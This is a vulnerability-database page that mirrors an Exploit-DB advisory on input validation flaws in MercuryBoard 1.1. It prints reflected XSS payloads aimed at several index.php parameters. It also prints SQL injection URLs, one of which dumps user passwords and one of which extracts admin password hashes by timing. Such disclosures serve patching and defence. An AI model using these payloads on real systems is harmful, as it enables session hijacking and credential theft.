Lucene search
+L

MercuryBoard 1.1 - Multiple Input Validation Vulnerabilities

🗓️ 25 Jan 2005 00:00:00Reported by Alberto TriveroType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 22 Views

Multiple input validation vulnerabilities in MercuryBoard could allow arbitrary code execution and SQL attacks.

Related
Code
ReporterTitlePublishedViews
Family
nessus
Tenable Nessus
MercuryBoard < 1.1.2 Multiple Vulnerabilities
25 Jan 200500:00
nessus
cve
CVE
CVE-2005-0307
10 Feb 200505:00
cve
cvelist
Cvelist
CVE-2005-0307
10 Feb 200505:00
cvelist
euvd
EUVD
EUVD-2005-0308
7 Oct 202500:30
euvd
nvd
NVD
CVE-2005-0307
25 Jan 200505:00
nvd
openvas
OpenVAS
Multiple Vulnerabilities in MercuryBoard
3 Nov 200500:00
openvas
source: https://www.securityfocus.com/bid/12359/info

Multiple input validation vulnerabilities affect MercuryBoard. These issues are due to a failure of the application to properly sanitize user-supplied input prior to using it in critical functionality.

An attacker may leverage these issues to execute arbitrary code in the browser of an unsuspecting user and manipulate SQL queries against the underlying database. This may facilitate the theft of authentication credentials, destruction of data, and other attacks.

http://www.example.com/index.php?a=pm&s='><script>alert(document.cookie)</script>
http://www.example.com/index.php?a=members&l='><script>alert(document.cookie)</script>
http://www.example.com/index.php?a='><script>alert(document.cookie)</script>
http://www.example.com/index.php?a=post&s='><script>alert(document.cookie)</script>
http://www.example.com/index.php?a=post&s=reply&t='><script>alert(document.cookie)</script>
http://www.example.com/index.php?a=pm&s=send&to='><script>alert(document.cookie)</script>
http://www.example.com/index.php?a=pm&s=send&to=2&re='><script>alert(document.cookie)</script>
http://www.example.com/index.php?a=cp&s='><script>alert(document.cookie)</script>

To leverage the SQL injection vulnerability:
http://www.example.com/index.php?a=post&s=reply&t=0%20UNION%20SELECT%20user_id,%20user_password%20FROM%20mb_users%20/*

http://www.example.com/mercuryboard/index.php?a=post&s=reply&t=1%20UNION%20SELECT%20IF(SUBSTRING(user_password,1,1)%20=%20CHAR(53),BENCHMARK(1000000,MD5(CHAR(1))),null),null,null,null,null%20FROM%20mb_users%20WHERE%20user_group%20=%201/*

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

28 Apr 2013 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 24.3
EPSS0.01735
22